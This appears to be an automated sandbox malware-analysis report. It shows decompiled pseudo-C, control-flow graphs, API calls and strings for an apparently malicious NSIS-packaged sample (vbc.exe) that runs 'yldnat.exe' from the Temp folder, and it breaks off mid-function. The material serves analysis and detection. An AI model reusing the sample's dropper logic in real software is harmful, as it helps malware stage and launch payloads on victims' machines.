                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                        • String ID:
                                                        • API String ID: 1860320154-0
                                                        • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                                                        • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
                                                        • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                                                        • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00403D1D Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 248 403d1d-403d35 call 406a3b 251 403d37-403d47 call 4065b5 248->251 252 403d49-403d80 call 40653c 248->252 261 403da3-403dcc call 403ff3 call 406045 251->261 257 403d82-403d93 call 40653c 252->257 258 403d98-403d9e lstrcatW 252->258 257->258 258->261 266 403dd2-403dd7 261->266 267 403e5e-403e66 call 406045 261->267 266->267 268 403ddd-403e05 call 40653c 266->268 273 403e74-403e99 LoadImageW 267->273 274 403e68-403e6f call 4066ab 267->274 268->267 275 403e07-403e0b 268->275 277 403f1a-403f22 call 40140b 273->277 278 403e9b-403ecb RegisterClassW 273->278 274->273 279 403e1d-403e29 lstrlenW 275->279 280 403e0d-403e1a call 405f6a 275->280 292 403f24-403f27 277->292 293 403f2c-403f37 call 403ff3 277->293 281 403ed1-403f15 SystemParametersInfoW CreateWindowExW 278->281 282 403fe9 278->282 286 403e51-403e59 call 405f3d call 40666e 279->286 287 403e2b-403e39 lstrcmpiW 279->287 280->279 281->277 285 403feb-403ff2 282->285 286->267 287->286 291 403e3b-403e45 GetFileAttributesW 287->291 296 403e47-403e49 291->296 297 403e4b-403e4c call 405f89 291->297 292->285 301 403fc0-403fc8 call 4057a3 293->301 302 403f3d-403f57 ShowWindow call 4069cb 293->302 296->286 296->297 297->286 307 403fe2-403fe4 call 40140b 301->307 308 403fca-403fd0 301->308 309 403f63-403f75 GetClassInfoW 302->309 310 403f59-403f5e call 4069cb 302->310 307->282 308->292 311 403fd6-403fdd call 40140b 308->311 314 403f77-403f87 GetClassInfoW RegisterClassW 309->314 315 403f8d-403fb0 DialogBoxParamW call 40140b 309->315 310->309 311->292 314->315 319 403fb5-403fbe call 403c6d 315->319 319->285
                                                        C-Code - Quality: 96%
                                                        			E00403D1D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8ab0;
				_t22 = E00406A3B(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f88;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
					__eflags =  *0x7a1f88;
					if(__eflags == 0) {
						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065B5(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FF3(_t78, _t90);
				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
				 *0x7a8b3c = 0x10000;
				if(E00406045(_t90, 0x7b3800) != 0) {
					L16:
					if(E00406045(_t98, 0x7b3800) == 0) {
						E004066AB(_t76, 0, _t82, 0x7b3800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040);
					 *0x7a7a88 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FF3(_t78, __eflags);
							__eflags =  *0x7a8b40;
							if( *0x7a8b40 != 0) {
								_t33 = E004057A3(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a6c;
								if( *0x7a7a6c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f68, 5); // executed
							_t39 = E004069CB("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069CB("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
								 *0x7a7a64 = _t87;
								RegisterClassW(0x7a7a40);
							}
							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
							E00403C6D(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8aa0;
						 *0x7a7a44 = E00401000;
						 *0x7a7a50 =  *0x7a8aa0;
						 *0x7a7a54 = _t30;
						 *0x7a7a64 = 0x40a3b4;
						if(RegisterClassW(0x7a7a40) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a6a40;
					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
					_t63 =  *0x7a6a40; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a6a42;
						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040666E(0x7b3800, E00405F3D(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F89(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                        0x00403d23
                                                        0x00403d2c
                                                        0x00403d33
                                                        0x00403d35
                                                        0x00403d49
                                                        0x00403d5b
                                                        0x00403d64
                                                        0x00403d6d
                                                        0x00403d74
                                                        0x00403d79
                                                        0x00403d80
                                                        0x00403d93
                                                        0x00403d93
                                                        0x00403d9e
                                                        0x00403d37
                                                        0x00403d42
                                                        0x00403d42
                                                        0x00403da3
                                                        0x00403db6
                                                        0x00403dbb
                                                        0x00403dcc
                                                        0x00403e5e
                                                        0x00403e66
                                                        0x00403e6f
                                                        0x00403e6f
                                                        0x00403e85
                                                        0x00403e8b
                                                        0x00403e99
                                                        0x00403f1a
                                                        0x00403f22
                                                        0x00403f2c
                                                        0x00403f31
                                                        0x00403f37
                                                        0x00403fc1
                                                        0x00403fc6
                                                        0x00403fc8
                                                        0x00403fe4
                                                        0x00000000
                                                        0x00403fe4
                                                        0x00403fca
                                                        0x00403fd0
                                                        0x00403fd8
                                                        0x00403fd8
                                                        0x00000000
                                                        0x00403fd0
                                                        0x00403f45
                                                        0x00403f50
                                                        0x00403f55
                                                        0x00403f57
                                                        0x00403f5e
                                                        0x00403f5e
                                                        0x00403f69
                                                        0x00403f71
                                                        0x00403f73
                                                        0x00403f75
                                                        0x00403f7e
                                                        0x00403f81
                                                        0x00403f87
                                                        0x00403f87
                                                        0x00403fa6
                                                        0x00403fb7
                                                        0x00000000
                                                        0x00403fbc
                                                        0x00403f24
                                                        0x00403f26
                                                        0x00000000
                                                        0x00403e9b
                                                        0x00403e9b
                                                        0x00403ea7
                                                        0x00403eb1
                                                        0x00403eb7
                                                        0x00403ebc
                                                        0x00403ecb
                                                        0x00403fe9
                                                        0x00403fe9
                                                        0x00000000
                                                        0x00403fe9
                                                        0x00403eda
                                                        0x00403f15
                                                        0x00000000
                                                        0x00403f15
                                                        0x00403dd2
                                                        0x00403dd2
                                                        0x00403dd5
                                                        0x00403dd7
                                                        0x00000000
                                                        0x00000000
                                                        0x00403de5
                                                        0x00403df7
                                                        0x00403dfc
                                                        0x00403e05
                                                        0x00000000
                                                        0x00000000
                                                        0x00403e0b
                                                        0x00403e0d
                                                        0x00403e1a
                                                        0x00403e1a
                                                        0x00403e23
                                                        0x00403e29
                                                        0x00403e51
                                                        0x00403e59
                                                        0x00000000
                                                        0x00403e3b
                                                        0x00403e3c
                                                        0x00403e45
                                                        0x00403e4b
                                                        0x00403e4c
                                                        0x00000000
                                                        0x00403e4c
                                                        0x00403e47
                                                        0x00403e49
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403e49
                                                        0x00403e29

                                                        APIs
                                                          • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                                                          • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                                                        • lstrcatW.KERNEL32 ref: 00403D9E
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,?,?,?,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,7556D4C4), ref: 00403E1E
                                                        • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,?,?,?,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,?,00000000,?), ref: 00403E3C
                                                        • LoadImageW.USER32 ref: 00403E85
                                                          • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                                                        • RegisterClassW.USER32 ref: 00403EC2
                                                        • SystemParametersInfoW.USER32 ref: 00403EDA
                                                        • CreateWindowExW.USER32 ref: 00403F0F
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403F45
                                                        • GetClassInfoW.USER32 ref: 00403F71
                                                        • GetClassInfoW.USER32 ref: 00403F7E
                                                        • RegisterClassW.USER32 ref: 00403F87
                                                        • DialogBoxParamW.USER32 ref: 00403FA6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                        • API String ID: 1975747703-2110472897
                                                        • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                                                        • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
                                                        • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                                                        • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004030D0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 202memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 40615e 325 403120-403125 322->325 326 40312a-403158 call 40666e call 405f89 call 40666e GetFileSize 322->326 327 403370-403374 325->327 334 403246-403254 call 40302e 326->334 335 40315e-403175 326->335 341 403328-40332d 334->341 342 40325a-40325d 334->342 337 403177 335->337 338 403179-403186 call 4035e8 335->338 337->338 346 4032e4-4032ec call 40302e 338->346 347 40318c-403192 338->347 341->327 344 403289-4032d8 GlobalAlloc call 40618d CreateFileW 342->344 345 40325f-403277 call 4035fe call 4035e8 342->345 361 4032da-4032df 344->361 362 4032ee-40331e call 4035fe call 403377 344->362 345->341 374 40327d-403283 345->374 346->341 351 403212-403216 347->351 352 403194-4031ac call 406119 347->352 357 403218-40321e call 40302e 351->357 358 40321f-403225 351->358 352->358 367 4031ae-4031b5 352->367 357->358 359 403227-403235 call 406b28 358->359 360 403238-403240 358->360 359->360 360->334 360->335 361->327 378 403323-403326 362->378 367->358 372 4031b7-4031be 367->372 372->358 375 4031c0-4031c7 372->375 374->341 374->344 375->358 377 4031c9-4031d0 375->377 377->358 379 4031d2-4031f2 377->379 378->341 380 40332f-403340 378->380 379->341 381 4031f8-4031fc 379->381 382 403342 380->382 383 403348-40334d 380->383 384 403204-40320c 381->384 385 4031fe-403202 381->385 382->383 386 40334e-403354 383->386 384->358 387 40320e-403210 384->387 385->334 385->384 386->386 388 403356-40336e call 406119 386->388 387->358 388->327
                                                        C-Code - Quality: 97%
                                                        			E004030D0(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t61;
				intOrPtr _t64;
				void* _t67;
				intOrPtr* _t69;
				long _t81;
				signed int _t88;
				intOrPtr _t91;
				void* _t94;
				void* _t99;
				void* _t103;
				long _t104;
				long _t107;
				void* _t108;

				_v8 = 0;
				_v12 = 0;
				 *0x7a8aac = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x7b6800, 0x400);
				_t103 = E0040615E(0x7b6800, 0x80000000, 3);
				 *0x40a018 = _t103;
				if(_t103 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040666E(0x7b4800, 0x7b6800);
				E0040666E(0x7b7000, E00405F89(0x7b4800));
				_t54 = GetFileSize(_t103, 0);
				 *0x79f740 = _t54;
				_t107 = _t54;
				if(_t54 <= 0) {
					L22:
					E0040302E(1);
					_pop(_t94);
					if( *0x7a8ab4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t108 = _t57;
						 *0x40ce78 = 0xb;
						 *0x40ce90 = 0; // executed
						E0040618D(_t94,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t61;
						if(_t61 != 0xffffffff) {
							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
							 *0x79f744 = _t64;
							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
							if(_t67 == _v20) {
								 *0x7a8ab0 = _t108;
								 *0x7a8ab8 =  *_t108;
								if((_v40 & 0x00000001) != 0) {
									 *0x7a8abc =  *0x7a8abc + 1;
								}
								_t45 = _t108 + 0x44; // 0x44
								_t69 = _t45;
								_t99 = 8;
								do {
									_t69 = _t69 - 8;
									 *_t69 =  *_t69 + _t108;
									_t99 = _t99 - 1;
								} while (_t99 != 0);
								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
								E00406119(0x7a8ac0, _t108 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035FE( *0x79f730);
					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t104 = _t107;
						asm("sbb eax, eax");
						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
						if(_t107 >= _t81) {
							_t104 = _t81;
						}
						if(E004035E8(0x797730, _t104) == 0) {
							E0040302E(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x7a8ab4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L19;
						}
						E00406119( &_v40, 0x797730, 0x1c);
						_t88 = _v40;
						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t88;
							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
							_t91 = _v16;
							 *0x7a8ab4 =  *0x79f730;
							if(_t91 > _t107) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t107 = _t91 - 4;
								if(_t104 > _t107) {
									_t104 = _t107;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t107 <  *0x79f740) {
							_v8 = E00406B28(_v8, 0x797730, _t104);
						}
						 *0x79f730 =  *0x79f730 + _t104;
						_t107 = _t107 - _t104;
					} while (_t107 != 0);
					goto L22;
				}
			}




























                                                        0x004030de
                                                        0x004030e1
                                                        0x004030fb
                                                        0x00403100
                                                        0x00403113
                                                        0x00403118
                                                        0x0040311e
                                                        0x00000000
                                                        0x00403120
                                                        0x00403131
                                                        0x00403142
                                                        0x00403149
                                                        0x00403151
                                                        0x00403156
                                                        0x00403158
                                                        0x00403246
                                                        0x00403248
                                                        0x00403253
                                                        0x00403254
                                                        0x00000000
                                                        0x00000000
                                                        0x0040325d
                                                        0x00403289
                                                        0x0040328e
                                                        0x00403294
                                                        0x004032a2
                                                        0x004032a9
                                                        0x004032af
                                                        0x004032ca
                                                        0x004032d3
                                                        0x004032d8
                                                        0x004032f7
                                                        0x00403307
                                                        0x00403319
                                                        0x0040331e
                                                        0x00403326
                                                        0x00403333
                                                        0x0040333b
                                                        0x00403340
                                                        0x00403342
                                                        0x00403342
                                                        0x0040334a
                                                        0x0040334a
                                                        0x0040334d
                                                        0x0040334e
                                                        0x0040334e
                                                        0x00403351
                                                        0x00403353
                                                        0x00403353
                                                        0x0040335d
                                                        0x00403369
                                                        0x00000000
                                                        0x0040336e
                                                        0x00000000
                                                        0x00403326
                                                        0x00000000
                                                        0x004032da
                                                        0x00403265
                                                        0x00403277
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040315e
                                                        0x0040315e
                                                        0x00403163
                                                        0x00403167
                                                        0x0040316e
                                                        0x00403175
                                                        0x00403177
                                                        0x00403177
                                                        0x00403186
                                                        0x004032e6
                                                        0x00403328
                                                        0x00000000
                                                        0x00403328
                                                        0x00403192
                                                        0x00403216
                                                        0x00403219
                                                        0x0040321e
                                                        0x00000000
                                                        0x00403216
                                                        0x0040319f
                                                        0x004031a4
                                                        0x004031ac
                                                        0x004031d2
                                                        0x004031e1
                                                        0x004031e7
                                                        0x004031ec
                                                        0x004031f2
                                                        0x00000000
                                                        0x00000000
                                                        0x004031fc
                                                        0x00403204
                                                        0x00403207
                                                        0x0040320c
                                                        0x0040320e
                                                        0x0040320e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004031fc
                                                        0x0040321f
                                                        0x00403225
                                                        0x00403235
                                                        0x00403235
                                                        0x00403238
                                                        0x0040323e
                                                        0x0040323e
                                                        0x00000000
                                                        0x0040315e

                                                        APIs
                                                        • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004030E4
                                                        • GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400), ref: 00403100
                                                          • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                                          • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                                        • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,007B6800,007B6800,80000000,00000003), ref: 00403149
                                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
                                                        Strings
                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403328
                                                        • Error launching installer, xrefs: 00403120
                                                        • Null, xrefs: 004031C9
                                                        • Inst, xrefs: 004031B7
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 0040329C
                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032DA
                                                        • soft, xrefs: 004031C0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 2803837635-2435864027
                                                        • Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                                                        • Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
                                                        • Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                                                        • Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 455 40176f-401794 call 402da6 call 405fb4 460 401796-40179c call 40666e 455->460 461 40179e-4017b0 call 40666e call 405f3d lstrcatW 455->461 467 4017b5-4017b6 call 4068f5 460->467 461->467 470 4017bb-4017bf 467->470 471 4017c1-4017cb call 4069a4 470->471 472 4017f2-4017f5 470->472 479 4017dd-4017ef 471->479 480 4017cd-4017db CompareFileTime 471->480 474 4017f7-4017f8 call 406139 472->474 475 4017fd-401819 call 40615e 472->475 474->475 482 40181b-40181e 475->482 483 40188d-4018b6 call 4056d0 call 403377 475->483 479->472 480->479 484 401820-40185e call 40666e * 2 call 4066ab call 40666e call 405cce 482->484 485 40186f-401879 call 4056d0 482->485 497 4018b8-4018bc 483->497 498 4018be-4018ca SetFileTime 483->498 484->470 518 401864-401865 484->518 495 401882-401888 485->495 499 402c33 495->499 497->498 501 4018d0-4018db CloseHandle 497->501 498->501 503 402c35-402c39 499->503 504 4018e1-4018e4 501->504 505 402c2a-402c2d 501->505 507 4018e6-4018f7 call 4066ab lstrcatW 504->507 508 4018f9-4018fc call 4066ab 504->508 505->499 512 401901-4023a2 call 405cce 507->512 508->512 512->503 512->505 518->495 520 401867-401868 518->520 520->485
                                                        C-Code - Quality: 77%
                                                        			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FB4( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\U";
				if(_t35 == 0) {
					lstrcatW(E00405F3D(E0040666E(_t81, 0x7b4000)), ??);
				} else {
					E0040666E();
				}
				E004068F5(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004069A4(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406139(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
